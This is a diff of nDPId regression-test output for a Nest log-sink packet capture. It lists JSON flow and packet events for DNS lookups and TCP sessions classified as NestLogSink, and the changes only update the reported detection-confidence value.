+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":727,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":727,"packets-processed":562,"total-skipped-flows":0,"total-l4-payload-len":56297,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":12,"total-detection-updates":3,"total-updates":0,"current-active-flows":1,"total-active-flows":12,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1536717873194} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1536718202959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536718202959,"pkt":"AJD7JidrGLQwJjRACABFAABEMJoAAP8RJazAqPIPwKjyAc5xADUAMPGqwpsBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1536718202959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536718202959,"pkt":"GLQwJjRAAJD7JidrCABFAABUb5VAAEARZaHAqPIBwKjyDwA1znEAQGW0wpuBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} 